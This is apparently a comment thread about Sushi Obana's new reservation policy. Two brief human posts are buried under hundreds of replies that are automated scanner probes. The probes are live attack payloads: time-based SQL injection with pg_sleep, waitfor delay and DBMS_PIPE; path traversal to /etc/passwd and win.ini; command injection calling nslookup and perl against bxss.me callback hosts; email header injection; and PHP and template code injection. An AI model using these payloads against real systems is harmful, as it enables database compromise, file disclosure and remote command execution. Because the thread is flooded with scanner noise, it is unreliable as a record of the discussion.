1 waitfor delay '0:0:15' --
re: gomaizo
9HISEwAx'; waitfor delay '0:0:15' --
re: gomaizo
-5 OR 34=(SELECT 34 FROM PG_SLEEP(15))--
re: gomaizo
-5) OR 53=(SELECT 53 FROM PG_SLEEP(15))--
re: gomaizo
-1)) OR 264=(SELECT 264 FROM PG_SLEEP(15))--
re: gomaizo
FKGxn41j' OR 563=(SELECT 563 FROM PG_SLEEP(15))--
re: gomaizo
t4CkAUXi') OR 861=(SELECT 861 FROM PG_SLEEP(15))--
re: gomaizo
C5jxFpGP')) OR 849=(SELECT 849 FROM PG_SLEEP(15))--
re: gomaizo
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: gomaizo
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: gomaizo
'||(select 1 from (select pg_sleep(15))x)||'
re: gomaizo
''||(select 1 from (select pg_sleep(15))x)||''
re: gomaizo
1'"
re: gomaizo
@@gCrB1
re: gomaizo
Fa17V59s
re: gomaizo
1*
re: gomaizo
1*
re: gomaizo
1*
re: gomaizo
1*
re: gomaizo
-1 OR 2+69-69-1=0+0+0+1
re: gomaizo
-1 OR 3+69-69-1=0+0+0+1
re: gomaizo
if(now()=sysdate(),sleep(15),0)
re: gomaizo
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: gomaizo
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: gomaizo
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: gomaizo
-1; waitfor delay '0:0:15' --
re: gomaizo
-1); waitfor delay '0:0:15' --
re: gomaizo
1 waitfor delay '0:0:15' --
re: gomaizo
LQqhbKjx'; waitfor delay '0:0:15' --
re: gomaizo
-5 OR 95=(SELECT 95 FROM PG_SLEEP(15))--
re: gomaizo
-5) OR 693=(SELECT 693 FROM PG_SLEEP(15))--
re: gomaizo
-1)) OR 119=(SELECT 119 FROM PG_SLEEP(15))--
re: gomaizo
aq0cx2vx' OR 901=(SELECT 901 FROM PG_SLEEP(15))--
re: gomaizo
rDitietu') OR 750=(SELECT 750 FROM PG_SLEEP(15))--
re: gomaizo
tTEzSHvK')) OR 45=(SELECT 45 FROM PG_SLEEP(15))--
re: gomaizo
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: gomaizo
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: gomaizo
'||(select 1 from (select pg_sleep(15))x)||'
re: gomaizo
''||(select 1 from (select pg_sleep(15))x)||''
re: gomaizo
1'"
re: gomaizo
@@fuDhz
re: gomaizo
1B5dvznNF6O
re: gomaizo
%0abcc:074625.67-22179.67.41618.19990.2@bxss.me
re: gomaizo
to@example.com>%0d%0abcc:074625.67-22180.67.41618.19990.2@bxss.me
re: gomaizo
response.write(9348667*9423883)
re: gomaizo
'+response.write(9348667*9423883)+'
re: gomaizo
"+response.write(9348667*9423883)+"
re: gomaizo
<esi:include src="http://bxss.me/rpb.png"/>
re: gomaizo
../../../../../../../../../../../../../../etc/passwd
re: gomaizo
${9999774+9999616}
re: gomaizo
../../../../../../../../../../../../../../windows/win.ini
re: gomaizo
file:///etc/passwd
re: gomaizo
../../../../../../../../../../../../../../../proc/version
re: gomaizo
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: gomaizo
../../../../../../../../../../etc/passwd%00.jpg
re: gomaizo
)
re: gomaizo
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: gomaizo
!(()&&!|*|*|
re: gomaizo
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: gomaizo
^(#$!@#$)(()))******
re: gomaizo
'.gethostbyname(lc('hitlo'.'iylfwfou96fc7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(68).chr(107).chr(89).'
re: gomaizo
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: gomaizo
".gethostbyname(lc("hitew"."shjvtdia8435b.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(69).chr(102).chr(77)."
re: gomaizo
/etc/passwd
re: gomaizo
echo wtzqgi$()\ rsutoo\nz^xyu||a #' &echo wtzqgi$()\ rsutoo\nz^xyu||a #|" &echo wtzqgi$()\ rsutoo\nz^xyu||a #
re: gomaizo
%2fetc%2fpasswd
re: gomaizo
&echo ehiaal$()\ rrsjco\nz^xyu||a #' &echo ehiaal$()\ rrsjco\nz^xyu||a #|" &echo ehiaal$()\ rrsjco\nz^xyu||a #
re: gomaizo
/.././.././.././.././.././.././.././../etc/./passwd%00
re: gomaizo
|echo xjtluq$()\ nqgbuj\nz^xyu||a #' |echo xjtluq$()\ nqgbuj\nz^xyu||a #|" |echo xjtluq$()\ nqgbuj\nz^xyu||a #
re: gomaizo
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: gomaizo
(nslookup hitxvvtpxyxpy6c24b.bxss.me||perl -e "gethostbyname('hitxvvtpxyxpy6c24b.bxss.me')")
re: gomaizo
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: gomaizo
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: gomaizo
$(nslookup hithuynljbibn0d05b.bxss.me||perl -e "gethostbyname('hithuynljbibn0d05b.bxss.me')")
re: gomaizo
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: gomaizo
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: gomaizo
&nslookup hitjpthzuaddec090a.bxss.me&'\"`0&nslookup hitjpthzuaddec090a.bxss.me&`'
re: gomaizo
Http://bxss.me/t/fit.txt
re: gomaizo
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: gomaizo
&(nslookup hitwgedyxaguy04b21.bxss.me||perl -e "gethostbyname('hitwgedyxaguy04b21.bxss.me')")&'\"`0&(nslookup hitwgedyxaguy04b21.bxss.me||perl -e "gethostbyname('hitwgedyxaguy04b21.bxss.me')")&`'
re: gomaizo
http://bxss.me/t/fit.txt%3F.jpg
re: gomaizo
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: gomaizo
HttP://bxss.me/t/xss.html?%00
re: gomaizo
|(nslookup hitzxghqmikhab33cc.bxss.me||perl -e "gethostbyname('hitzxghqmikhab33cc.bxss.me')")
re: gomaizo
"+"A".concat(70-3).concat(22*4).concat(113).concat(74).concat(99).concat(84)+(require"socket"
Socket.gethostbyname("hitnp"+"ejchmlfjcbc29.bxss.me.")[3].to_s)+"
re: gomaizo
/etc/shells
re: gomaizo
file:///etc/passwd
re: gomaizo
bxss.me/t/xss.html?%00
re: gomaizo
`(nslookup hitomybhschesdbcbc.bxss.me||perl -e "gethostbyname('hitomybhschesdbcbc.bxss.me')")`
re: gomaizo
'+'A'.concat(70-3).concat(22*4).concat(108).concat(89).concat(117).concat(71)+(require'socket'
Socket.gethostbyname('hitxj'+'uhypxjsfb9d32.bxss.me.')[3].to_s)+'
re: gomaizo
c:/windows/win.ini
re: gomaizo
/\../\../\../\../\../\../\../etc/passwd
re: gomaizo
;(nslookup hittptkedzunc383b7.bxss.me||perl -e "gethostbyname('hittptkedzunc383b7.bxss.me')")|(nslookup hittptkedzunc383b7.bxss.me||perl -e "gethostbyname('hittptkedzunc383b7.bxss.me')")&(nslookup hittptkedzunc383b7.bxss.me||perl -e "gethostbyname('hittptkedzunc383b7.bxss.me')")
re: gomaizo
bxss.me
re: gomaizo
/WEB-INF/web.xml
re: gomaizo
C:\WINDOWS\system32\drivers\etc\hosts
re: gomaizo
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: gomaizo
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: gomaizo
../../../../../../../../../../windows/win.ini%00.jpg
re: gomaizo
';print(md5(31337));$a='
re: gomaizo
/../../../../../../../../../../boot.ini
re: gomaizo
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: gomaizo
";print(md5(31337));$a="
re: gomaizo
'"
re: gomaizo
..\..\..\..\..\..\..\..\windows\win.ini
re: gomaizo
${@print(md5(31337))}
re: gomaizo
<!--
re: gomaizo
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: gomaizo
${@print(md5(31337))}\
re: gomaizo
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: gomaizo
'.print(md5(31337)).'
re: gomaizo
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: gomaizo
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: gomaizo
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: gomaizo
WEB-INF/web.xml
re: gomaizo
WEB-INF\web.xml
re: gomaizo
1
re: gomaizo
1
re: gomaizo
-1 OR 2+162-162-1=0+0+0+1 --
re: gomaizo
-1 OR 3+162-162-1=0+0+0+1 --
re: gomaizo
-1 OR 2+635-635-1=0+0+0+1
re: gomaizo
-1 OR 3+635-635-1=0+0+0+1
re: gomaizo
-1' OR 2+831-831-1=0+0+0+1 --
re: gomaizo
-1' OR 3+831-831-1=0+0+0+1 --
re: gomaizo
-1' OR 2+834-834-1=0+0+0+1 or '28BySesx'='
re: gomaizo
-1' OR 3+834-834-1=0+0+0+1 or '28BySesx'='
re: gomaizo
-1" OR 2+439-439-1=0+0+0+1 --
re: gomaizo
-1" OR 3+439-439-1=0+0+0+1 --
re: gomaizo
if(now()=sysdate(),sleep(15),0)
re: gomaizo
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: gomaizo
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: gomaizo
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: gomaizo
-1; waitfor delay '0:0:15' --
re: gomaizo
-1); waitfor delay '0:0:15' --
re: gomaizo
1 waitfor delay '0:0:15' --
re: gomaizo
AJNlP5fe'; waitfor delay '0:0:15' --
re: gomaizo
-5 OR 515=(SELECT 515 FROM PG_SLEEP(15))--
re: gomaizo
-5) OR 627=(SELECT 627 FROM PG_SLEEP(15))--
re: gomaizo
-1)) OR 270=(SELECT 270 FROM PG_SLEEP(15))--
re: gomaizo
cpiZMAp7' OR 417=(SELECT 417 FROM PG_SLEEP(15))--
re: gomaizo
Yvd02HyL') OR 362=(SELECT 362 FROM PG_SLEEP(15))--
re: gomaizo
2UCCovuw')) OR 335=(SELECT 335 FROM PG_SLEEP(15))--
re: gomaizo
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: gomaizo
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: gomaizo
'||(select 1 from (select pg_sleep(15))x)||'
re: gomaizo
''||(select 1 from (select pg_sleep(15))x)||''
re: gomaizo
1'"
re: gomaizo
@@HDOUt
Wow I was reading the new reservation requirements by sushi obana.
They don't accept new reservations and if you have not visited for more than 2 years, you are treated as a new customer.
In my opinion, it is a bit too extreme of a policy.
re: guest
vfli1LS5
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+270-270-1=0+0+0+1
re: guest
-1 OR 3+270-270-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
wov3RBJ9'; waitfor delay '0:0:15' --
re: guest
-5 OR 96=(SELECT 96 FROM PG_SLEEP(15))--
re: guest
-5) OR 269=(SELECT 269 FROM PG_SLEEP(15))--
re: guest
-1)) OR 750=(SELECT 750 FROM PG_SLEEP(15))--
re: guest
mwQAjbu4' OR 502=(SELECT 502 FROM PG_SLEEP(15))--
re: guest
lNyU2VhI') OR 85=(SELECT 85 FROM PG_SLEEP(15))--
re: guest
8nS0lS2g')) OR 950=(SELECT 950 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
zbG9iUvb
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+136-136-1=0+0+0+1
re: guest
-1 OR 3+136-136-1=0+0+0+1
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@bt867
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
LxNlCO3g'; waitfor delay '0:0:15' --
re: guest
-5 OR 665=(SELECT 665 FROM PG_SLEEP(15))--
re: guest
-5) OR 812=(SELECT 812 FROM PG_SLEEP(15))--
re: guest
-1)) OR 555=(SELECT 555 FROM PG_SLEEP(15))--
re: guest
GO80Pa9Z' OR 293=(SELECT 293 FROM PG_SLEEP(15))--
re: guest
pxIFt9G7') OR 684=(SELECT 684 FROM PG_SLEEP(15))--
re: guest
PrMM34gb')) OR 124=(SELECT 124 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@vry8Q
Yeh I've heard that it has become effectively intro-only.
Curious, where did you see the new reservation requirements for Sushi Obana?
re: guest
l1fbFZbq
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+836-836-1=0+0+0+1
re: guest
-1 OR 3+836-836-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
I425tgb1'; waitfor delay '0:0:15' --
re: guest
-5 OR 114=(SELECT 114 FROM PG_SLEEP(15))--
re: guest
-5) OR 433=(SELECT 433 FROM PG_SLEEP(15))--
re: guest
-1)) OR 188=(SELECT 188 FROM PG_SLEEP(15))--
re: guest
W384jlxr' OR 898=(SELECT 898 FROM PG_SLEEP(15))--
re: guest
hBuKzebP') OR 123=(SELECT 123 FROM PG_SLEEP(15))--
re: guest
W2pIgV4R
re: guest
1*
re: guest
1*
re: guest
IEhY14Le')) OR 838=(SELECT 838 FROM PG_SLEEP(15))--
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+95-95-1=0+0+0+1
re: guest
-1 OR 3+95-95-1=0+0+0+1
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
@@xCwOb
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
WpZlBs1e'; waitfor delay '0:0:15' --
re: guest
-5 OR 17=(SELECT 17 FROM PG_SLEEP(15))--
re: guest
-5) OR 547=(SELECT 547 FROM PG_SLEEP(15))--
re: guest
-1)) OR 167=(SELECT 167 FROM PG_SLEEP(15))--
re: guest
TdCMdAYp' OR 496=(SELECT 496 FROM PG_SLEEP(15))--
re: guest
8tzHqhtZ') OR 778=(SELECT 778 FROM PG_SLEEP(15))--
re: guest
F51uGb06')) OR 439=(SELECT 439 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@C6iqb
re: guest
1BxEptFYaYO
re: guest
%0abcc:074625.67-22218.67.52006.19990.2@bxss.me
re: guest
response.write(9557121*9208826)
re: guest
to@example.com>%0d%0abcc:074625.67-22219.67.52006.19990.2@bxss.me
re: guest
'+response.write(9557121*9208826)+'
re: guest
"+response.write(9557121*9208826)+"
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
${9999097+9999333}
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
)
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
'.gethostbyname(lc('hitfo'.'etocktdlf8bb9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(65).chr(105).chr(65).'
re: guest
!(()&&!|*|*|
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
".gethostbyname(lc("hitmj"."mkcbclnr0e3ef.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(80).chr(103).chr(79)."
re: guest
^(#$!@#$)(()))******
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
echo mlruun$()\ hoksop\nz^xyu||a #' &echo mlruun$()\ hoksop\nz^xyu||a #|" &echo mlruun$()\ hoksop\nz^xyu||a #
re: guest
/etc/passwd
re: guest
